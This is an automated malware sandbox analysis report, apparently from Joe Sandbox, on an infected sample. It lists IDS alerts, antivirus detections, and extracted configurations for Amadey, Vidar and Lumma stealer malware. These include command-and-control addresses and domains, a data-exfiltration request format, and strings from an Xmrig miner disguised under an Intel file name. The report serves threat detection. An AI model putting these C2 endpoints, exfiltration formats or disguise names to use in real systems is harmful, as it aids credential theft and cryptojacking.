                          2024-12-21T01:16:17.111430+010020583611Domain Observed Used for C2 Detected192.168.2.550205172.67.197.170443TCP
                          2024-12-21T01:16:19.193764+010020583611Domain Observed Used for C2 Detected192.168.2.550216172.67.197.170443TCP
                          2024-12-21T01:16:21.323075+010020583611Domain Observed Used for C2 Detected192.168.2.550217172.67.197.170443TCP
                          2024-12-21T01:16:23.665889+010020583611Domain Observed Used for C2 Detected192.168.2.550220172.67.197.170443TCP
                          2024-12-21T01:16:26.541293+010020583611Domain Observed Used for C2 Detected192.168.2.550223172.67.197.170443TCP
                          2024-12-21T01:16:31.127252+010020583611Domain Observed Used for C2 Detected192.168.2.550225172.67.197.170443TCP
                          2024-12-21T01:16:42.832038+010020583611Domain Observed Used for C2 Detected192.168.2.550266172.67.197.170443TCP
                          2024-12-21T01:16:44.891244+010020583611Domain Observed Used for C2 Detected192.168.2.550274172.67.197.170443TCP
                          2024-12-21T01:16:47.440474+010020583611Domain Observed Used for C2 Detected192.168.2.550278172.67.197.170443TCP
                          2024-12-21T01:16:49.577689+010020583611Domain Observed Used for C2 Detected192.168.2.550279172.67.197.170443TCP
                          2024-12-21T01:16:51.751651+010020583611Domain Observed Used for C2 Detected192.168.2.550281172.67.197.170443TCP
                          2024-12-21T01:16:54.036718+010020583611Domain Observed Used for C2 Detected192.168.2.550286172.67.197.170443TCP
                          2024-12-21T01:16:56.171112+010020583611Domain Observed Used for C2 Detected192.168.2.550288172.67.197.170443TCP
                          2024-12-21T01:16:58.373137+010020583611Domain Observed Used for C2 Detected192.168.2.550291172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:46.006483+010020583981Domain Observed Used for C2 Detected192.168.2.549911104.21.23.76443TCP
                          2024-12-21T01:14:47.981783+010020583981Domain Observed Used for C2 Detected192.168.2.549917104.21.23.76443TCP
                          2024-12-21T01:14:50.493760+010020583981Domain Observed Used for C2 Detected192.168.2.549923104.21.23.76443TCP
                          2024-12-21T01:14:53.178057+010020583981Domain Observed Used for C2 Detected192.168.2.549933104.21.23.76443TCP
                          2024-12-21T01:14:55.745500+010020583981Domain Observed Used for C2 Detected192.168.2.549942104.21.23.76443TCP
                          2024-12-21T01:14:59.528961+010020583981Domain Observed Used for C2 Detected192.168.2.549953104.21.23.76443TCP
                          2024-12-21T01:15:02.034539+010020583981Domain Observed Used for C2 Detected192.168.2.549963104.21.23.76443TCP
                          2024-12-21T01:15:08.315228+010020583981Domain Observed Used for C2 Detected192.168.2.549992104.21.23.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:11.767125+010020197142Potentially Bad Traffic192.168.2.550182185.215.113.1680TCP
                          2024-12-21T01:16:33.273700+010020197142Potentially Bad Traffic192.168.2.550229185.215.113.1680TCP
                          2024-12-21T01:17:00.489127+010020197142Potentially Bad Traffic192.168.2.550294185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:21.884611+010020446961A Network Trojan was detected192.168.2.549852185.215.113.4380TCP
                          2024-12-21T01:14:28.782877+010020446961A Network Trojan was detected192.168.2.549871185.215.113.4380TCP
                          2024-12-21T01:14:37.157206+010020446961A Network Trojan was detected192.168.2.549889185.215.113.4380TCP
                          2024-12-21T01:14:44.360100+010020446961A Network Trojan was detected192.168.2.549906185.215.113.4380TCP
                          2024-12-21T01:14:56.837587+010020446961A Network Trojan was detected192.168.2.549944185.215.113.4380TCP
                          2024-12-21T01:15:04.599189+010020446961A Network Trojan was detected192.168.2.549972185.215.113.4380TCP
                          2024-12-21T01:15:12.148820+010020446961A Network Trojan was detected192.168.2.550008185.215.113.4380TCP
                          2024-12-21T01:15:34.168754+010020446961A Network Trojan was detected192.168.2.550090185.215.113.4380TCP
                          2024-12-21T01:15:42.955787+010020446961A Network Trojan was detected192.168.2.550141185.215.113.4380TCP
                          2024-12-21T01:15:51.589379+010020446961A Network Trojan was detected192.168.2.550152185.215.113.4380TCP
                          2024-12-21T01:16:01.692683+010020446961A Network Trojan was detected192.168.2.550166185.215.113.4380TCP
                          2024-12-21T01:16:09.204692+010020446961A Network Trojan was detected192.168.2.550176185.215.113.4380TCP
                          2024-12-21T01:16:19.384371+010020446961A Network Trojan was detected192.168.2.550213185.215.113.4380TCP
                          2024-12-21T01:18:25.850691+010020446961A Network Trojan was detected192.168.2.550378185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:15:31.865412+010020543501A Network Trojan was detected192.168.2.550080185.121.15.19280TCP
                          2024-12-21T01:15:33.543749+010020543501A Network Trojan was detected192.168.2.550096185.121.15.19280TCP
                          2024-12-21T01:15:43.479854+010020543501A Network Trojan was detected192.168.2.550142185.121.15.19280TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:35.802477+010020583601Domain Observed Used for C2 Detected192.168.2.5568491.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:35.418961+010020583641Domain Observed Used for C2 Detected192.168.2.5576281.1.1.153UDP
                          2024-12-21T01:15:49.574881+010020583641Domain Observed Used for C2 Detected192.168.2.5527581.1.1.153UDP
                          2024-12-21T01:16:05.317514+010020583641Domain Observed Used for C2 Detected192.168.2.5520281.1.1.153UDP
                          2024-12-21T01:16:41.402522+010020583641Domain Observed Used for C2 Detected192.168.2.5634841.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:44.180568+010020583971Domain Observed Used for C2 Detected192.168.2.5561851.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:35.161864+010020583781Domain Observed Used for C2 Detected192.168.2.5577501.1.1.153UDP
                          2024-12-21T01:15:49.378015+010020583781Domain Observed Used for C2 Detected192.168.2.5643191.1.1.153UDP
                          2024-12-21T01:16:05.169189+010020583781Domain Observed Used for C2 Detected192.168.2.5515791.1.1.153UDP
                          2024-12-21T01:16:41.245299+010020583781Domain Observed Used for C2 Detected192.168.2.5598991.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:01.990830+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.550165TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:01.868769+010020442441Malware Command and Control Activity Detected192.168.2.550165185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:02.319188+010020442461Malware Command and Control Activity Detected192.168.2.550165185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:03.869653+010020442481Malware Command and Control Activity Detected192.168.2.550165185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:15:01.249672+010020442471Malware Command and Control Activity Detected116.203.12.114443192.168.2.549958TCP
                          2024-12-21T01:16:02.442183+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.550165TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:15:03.563029+010020518311Malware Command and Control Activity Detected116.203.12.114443192.168.2.549966TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:58.917640+010020490871A Network Trojan was detected192.168.2.549950116.203.12.114443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:54.186505+010020480941Malware Command and Control Activity Detected192.168.2.549933104.21.23.76443TCP
                          2024-12-21T01:15:56.550726+010020480941Malware Command and Control Activity Detected192.168.2.550161172.67.197.170443TCP
                          2024-12-21T01:16:26.571237+010020480941Malware Command and Control Activity Detected192.168.2.550223172.67.197.170443TCP
                          2024-12-21T01:16:57.100415+010020480941Malware Command and Control Activity Detected192.168.2.550288172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:01.419519+010020442431Malware Command and Control Activity Detected192.168.2.550165185.215.113.20680TCP
                          2024-12-21T01:16:57.683367+010020442431Malware Command and Control Activity Detected192.168.2.550289185.215.113.20680TCP
                          2024-12-21T01:17:00.781794+010020442431Malware Command and Control Activity Detected192.168.2.550293185.215.113.20680TCP
                          2024-12-21T01:17:04.312888+010020442431Malware Command and Control Activity Detected192.168.2.550296185.215.113.20680TCP
                          2024-12-21T01:17:11.012824+010020442431Malware Command and Control Activity Detected192.168.2.550300185.215.113.20680TCP
                          2024-12-21T01:17:13.035808+010020442431Malware Command and Control Activity Detected192.168.2.550301185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:06.475463+010028561471A Network Trojan was detected192.168.2.549814185.215.113.4380TCP
                          2024-12-21T01:19:11.745916+010028561471A Network Trojan was detected192.168.2.550394185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:20.549633+010028561221A Network Trojan was detected185.215.113.4380192.168.2.549823TCP
                          2024-12-21T01:18:24.506220+010028561221A Network Trojan was detected185.215.113.4380192.168.2.550376TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:10.947662+010028033053Unknown Traffic192.168.2.54982831.41.244.1180TCP
                          2024-12-21T01:14:23.328958+010028033053Unknown Traffic192.168.2.54985831.41.244.1180TCP
                          2024-12-21T01:14:30.236101+010028033053Unknown Traffic192.168.2.54987331.41.244.1180TCP
                          2024-12-21T01:14:38.978681+010028033053Unknown Traffic192.168.2.54989331.41.244.1180TCP
                          2024-12-21T01:14:45.887085+010028033053Unknown Traffic192.168.2.54991031.41.244.1180TCP
                          2024-12-21T01:14:58.336790+010028033053Unknown Traffic192.168.2.54995131.41.244.1180TCP
                          2024-12-21T01:15:06.157567+010028033053Unknown Traffic192.168.2.54997531.41.244.1180TCP
                          2024-12-21T01:15:12.290709+010028033053Unknown Traffic192.168.2.55001531.41.244.1180TCP
                          2024-12-21T01:15:14.843200+010028033053Unknown Traffic192.168.2.55002131.41.244.1180TCP
                          2024-12-21T01:15:23.036234+010028033053Unknown Traffic192.168.2.55004631.41.244.1180TCP
                          2024-12-21T01:15:35.620897+010028033053Unknown Traffic192.168.2.55010531.41.244.1180TCP
                          2024-12-21T01:15:44.466068+010028033053Unknown Traffic192.168.2.550144185.215.113.1680TCP
                          2024-12-21T01:15:53.119656+010028033053Unknown Traffic192.168.2.550156185.215.113.1680TCP
                          2024-12-21T01:16:03.196463+010028033053Unknown Traffic192.168.2.550168185.215.113.1680TCP
                          2024-12-21T01:16:10.703583+010028033053Unknown Traffic192.168.2.550181185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:16:04.490294+010028033043Unknown Traffic192.168.2.550165185.215.113.20680TCP
                          2024-12-21T01:16:40.421914+010028033043Unknown Traffic192.168.2.550235185.215.113.20680TCP
                          2024-12-21T01:16:42.262156+010028033043Unknown Traffic192.168.2.550235185.215.113.20680TCP
                          2024-12-21T01:16:43.559365+010028033043Unknown Traffic192.168.2.550235185.215.113.20680TCP
                          2024-12-21T01:16:44.600463+010028033043Unknown Traffic192.168.2.550235185.215.113.20680TCP
                          2024-12-21T01:16:48.070175+010028033043Unknown Traffic192.168.2.550235185.215.113.20680TCP
                          2024-12-21T01:16:49.120751+010028033043Unknown Traffic192.168.2.550235185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:15:02.039383+010028438641A Network Trojan was detected192.168.2.549963104.21.23.76443TCP
                          2024-12-21T01:16:05.593253+010028438641A Network Trojan was detected192.168.2.550169172.67.197.170443TCP
                          2024-12-21T01:16:26.571237+010028438641A Network Trojan was detected192.168.2.550223172.67.197.170443TCP
                          2024-12-21T01:16:57.100415+010028438641A Network Trojan was detected192.168.2.550288172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:56.572647+010028593781Malware Command and Control Activity Detected192.168.2.549941116.203.12.114443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Found malware configuration
                          Source: 0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                          Source: 00000000.00000003.2108909272.0000000004850000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "grannyejh.lat", "aspecteirs.lat", "energyaffai.lat", "discokeyus.lat", "pancakedipyps.click", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "FATE99--test"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeReversingLabs: Detection: 57%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exeReversingLabs: Detection: 27%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeReversingLabs: Detection: 86%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeReversingLabs: Detection: 86%
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeReversingLabs: Detection: 57%
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeReversingLabs: Detection: 27%
                          Source: C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 69%
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 69%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 52%
                          Source: file.exeVirustotal: Detection: 58%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: rapeflowwj.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: crosshuaht.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: sustainskelet.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: aspecteirs.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: energyaffai.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: necklacebudi.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: discokeyus.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: grannyejh.lat
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: pancakedipyps.click
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: - Screen Resoluton:
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: Workgroup: -
                          Source: 49.2.4fa7efe79d.exe.400000.0.unpackString decryptor: FATE99--test
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_bd84ff5d-0

                          Bitcoin Miner

                          barindex
                          Yara detected Xmrig cryptocurrency miner
                          Source: Yara matchFile source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000021.00000002.2944554300.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.2944554300.000000000125B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000035.00000002.3284564617.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000035.00000002.3283875362.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.2950639001.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000035.00000002.3283875362.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 5044, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5284, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 380, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2448, type: MEMORYSTR
                          Found strings related to Crypto-Mining
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49890 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49911 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49923 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49924 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49933 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.5:49930 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49942 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49953 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49963 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.5:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50151 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50161 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50163 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50164 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50167 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50169 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50170 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50180 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50205 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50216 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50217 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50220 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50223 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50225 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50266 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00667978 FindFirstFileW,FindFirstFileW,free,10_2_00667978
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_00406301 FindFirstFileW,FindClose,28_2_00406301
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,28_2_00406CC7
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,44_2_0008DC54
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,44_2_0009A087
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,44_2_0009A1E2
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,44_2_0008E472
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,44_2_0009A570
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0005C622 FindFirstFileExW,44_2_0005C622
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000966DC FindFirstFileW,FindNextFileW,FindClose,44_2_000966DC
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00097333 FindFirstFileW,FindClose,44_2_00097333
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,44_2_000973D4
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,44_2_0008D921
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,10_2_0066881C
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49814 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49823
